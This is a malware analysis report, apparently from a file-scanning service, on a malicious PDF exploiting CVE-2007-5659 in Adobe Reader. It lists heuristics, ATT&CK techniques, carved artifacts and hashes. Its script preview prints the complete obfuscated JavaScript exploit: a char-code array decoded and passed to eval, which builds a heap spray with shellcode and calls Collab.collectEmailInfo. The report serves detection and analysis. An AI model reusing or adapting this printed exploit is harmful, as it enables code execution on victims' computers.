MALICIOUS
348
Risk Score
Malware Insights
MITRE ATT&CK
T1059.007 JavaScript
T1203 Exploitation for Client Execution
The PDF sample contains heavily obfuscated JavaScript that utilizes `eval()` and `String.fromCharCode` to construct and execute code. Heuristics indicate this code performs a heap spray and exploits CVE-2007-5659 via the `Collab.collectEmailInfo` API. The embedded JavaScript is multi-stage and likely downloads and executes a secondary payload, though the full chain could not be recovered due to obfuscation.
Machine Learning
- Nyx PDF Classifier malicious score 0.9972
Heuristics 10
-
Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after nested-decoder de-obfuscation)
-
JavaScript action low 3 related findings PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Obfuscated multi-stage PDF JavaScript heap-spray exploit critical PDF_JS_OBFUSCATED_MULTISTAGE_HEAPSPRAYPDF JavaScript hidden behind nested stream filters and/or a custom in-JS decoder (rolling-XOR stager) decodes to a heap-spray / ROP chain. The spray is only visible after unwinding those layers, which is why the raw heap-spray rules miss it. This is an obfuscated multi-stage Adobe Reader JavaScript exploit; the dropped Windows payload (often named Win.Trojan.Agent by signature AV) is the second stage, not the delivery mechanism.
-
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTERPDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.Matched line in script
eval(cc); -
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Secondary embedded PDF body has suspicious static findings critical POLYGLOT_CHILD_PDF_STATIC_TRIAGEA valid PDF body was found at a nonzero offset inside another container and its carved contents matched PDF exploit or lure heuristics. This catches polyglots where the top-level magic routes to ZIP/OLE while a PDF reader or downstream parser opens the hidden PDF payload.
-
Embedded file low PDF_EMBEDDEDPDF embeds a file attachment — could carry an executable or another weaponised document as a nested payload
-
Object number defined twice with different bodies info PDF_DUPLICATE_OBJ_BODY_INCREMENTALThe same indirect object (N G) is defined more than once with different body bytes. First-wins and last-wins readers will resolve different content, which is a parser-confusion shape used by targeted PDFs. Body-only differences are common in benign incremental updates, so severity is raised only when the duplicate carries active content.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In PDF document text
- http://ns.adobe.com/pdf/1.3/In PDF document text
- http://ns.adobe.com/pdfx/1.3/In PDF document text
- http://ns.adobe.com/xap/1.0/In PDF document text
- http://ns.adobe.com/xap/1.0/mm/In PDF document text
- http://purl.org/dc/elements/1.1/In PDF document text
- http://ns.adobe.com/photoshop/1.0/In PDF document text
Extracted artifacts 4
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
3.jpg |
pdf-embedded-file | PDF EmbeddedFile object 31 at offset 0x2303 | 403 bytes |
SHA-256: 5d6527b148e8d84a27a4f669d817a52d39abe9bec61e35a052c66d495101c827 |
|||
javascript_obj0037_000.js |
pdf-javascript-stream | PDF /JS object 37 at offset 0xBA204 | 3433 bytes |
SHA-256: 98e3c3ca0476ffedc3c2fffc3d2bff11646ce68d12d65706966657d0d9c107a5 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 2 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
sss =Array(102,117,110,99,116,105,111,110,32,114,101,40,99,111,117,110,116,64,119,104,97,116,41,123,118,97,114,32,118,32,61,32,34,34,59,119,104,105,108,101,32,40,45,45,99,111,117,110,116,32,62,61,32,48,41,118,32,43,61,32,119,104,97,116,59,114,101,116,117,114,110,32,118,59,125,102,117,110,99,116,105,111,110,32,115,116,97,114,116,40,41,123,115,99,32,61,32,117,110,101,115,99,97,112,101,40,34,37,117,57,48,57,48,37,117,57,48,57,48,37,117,57,48,57,48,37,117,57,48,57,48,37,117,57,48,57,48,37,117,68,52,56,66,37,117,67,65,56,48,37,117,52,50,70,70,37,117,52,51,54,65,37,117,53,50,53,56,37,117,50,69,67,68,37,117,51,67,53,65,37,117,55,52,48,53,37,117,52,50,70,49,37,117,70,65,56,48,37,117,55,55,70,67,37,117,66,56,69,66,37,117,65,67,66,70,37,117,65,55,66,54,37,117,48,50,48,51,37,117,70,49,55,53,37,117,69,50,70,70,34,41,59,105,102,40,97,112,112,46,118,105,101,119,101,114,86,101,114,115,105,111,110,32,62,61,32,55,46,48,41,123,112,108,105,110,32,61,32,114,101,40,49,49,50,52,64,117,110,101,115,99,97,112,101,40,34,37,117,48,98,48,98,37,117,48,48,50,56,37,117,48,54,101,98,37,117,48,54,101,98,34,41,41,32,43,32,117,110,101,115,99,97,112,101,40,34,37,117,48,98,48,98,37,117,48,48,50,56,37,117,48,97,101,98,37,117,48,97,101,98,34,41,32,43,32,117,110,101,115,99,97,112,101,40,34,37,117,57,48,57,48,37,117,57,48,57,48,34,41,32,43,32,114,101,40,49,50,50,64,117,110,101,115,99,97,112,101,40,34,37,117,48,98,48,98,37,117,48,48,50,56,37,117,48,54,101,98,37,117,48,54,101,98,34,41,41,32,43,32,115,99,32,43,32,114,101,40,49,50,53,54,64,117,110,101,115,99,97,112,101,40,34,37,117,52,49,52,49,37,117,52,49,52,49,34,41,41,59,125,101,108,115,101,123,101,102,54,32,61,32,32,117,110,101,115,99,97,112,101,40,34,37,117,102,54,101,98,37,117,102,54,101,98,34,41,32,43,32,117,110,101,115,99,97,112,101,40,34,37,117,48,98,48,98,37,117,48,48,49,57,34,41,59,112,108,105,110,32,61,32,114,101,40,56,48,64,117,110,101,115,99,97,112,101,40,34,37,117,57,48,57,48,37,117,57,48,57,48,34,41,41,32,43,32,115,99,32,43,32,114,101,40,56,48,64,117,110,101,115,99,97,112,101,40,34,37,117,57,48,57,48,37,117,57,48,57,48,34,41,41,43,32,117,110,101,115,99,97,112,101,40,34,37,117,101,55,101,57,37,117,102,102,102,57,34,41,43,117,110,101,115,99,97,112,101,40,34,37,117,102,102,102,102,37,117,102,102,102,102,34,41,32,43,32,117,110,101,115,99,97,112,101,40,34,37,117,102,54,101,98,37,117,102,52,101,98,34,41,32,43,32,117,110,101,115,99,97,112,101,40,34,37,117,102,50,101,98,37,117,102,49,101,98,34,41,59,119,104,105,108,101,32,40,40,112,108,105,110,46,108,101,110,103,116,104,32,37,32,56,41,32,33,61,32,48,41,112,108,105,110,32,61,32,117,110,101,115,99,97,112,101,40,34,37,117,52,49,52,49,34,41,32,43,32,112,108,105,110,59,112,108,105,110,32,43,61,32,114,101,40,50,54,50,54,64,101,102,54,41,59,125,105,102,32,40,97,112,112,46,118,105,101,119,101,114,86,101,114,115,105,111,110,32,62,61,32,54,46,48,41,123,116,104,105,115,46,99,111,108,108,97,98,83,116,111,114,101,32,61,32,67,111,108,108,97,98,46,99,111,108,108,101,99,116,69,109,97,105,108,73,110,102,111,40,123,115,117,98,106,58,32,34,34,64,109,115,103,58,32,112,108,105,110,125,41,59,125,125,118,97,114,32,115,104,97,102,116,32,61,32,97,112,112,46,115,101,116,84,105,109,101,79,117,116,40,34,115,116,97,114,116,40,41,34,64,49,50,48,48,41,59);
var arr =new Array();
for(var i=0;i<sss.length;i++)
{
arr[i]=String.fromCharCode(sss[i]);
}
var cc = arr.toString().replace(/,/g,"");
cc = cc.replace(/@/g,",")
eval(cc);
|
|||
font_00_sfnt_off000330f4.bin |
pdf-font-stream | PDF embedded font (sfnt) at offset 0x330F4 | 341296 bytes |
SHA-256: 2799947f4e001e38825bf5ee08cc007eda7b41ee058bcd2f642e771c0ea2aef7 |
|||
polyglot_child_pdf_off00030ed0.pdf |
polyglot-child-pdf | Secondary PDF body inside pdf container at offset 0x30ED0 | 567761 bytes |
SHA-256: 7261617645f4447dcd9dcdb452342e0813e39ab371a40229a14d53033fe93aae |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.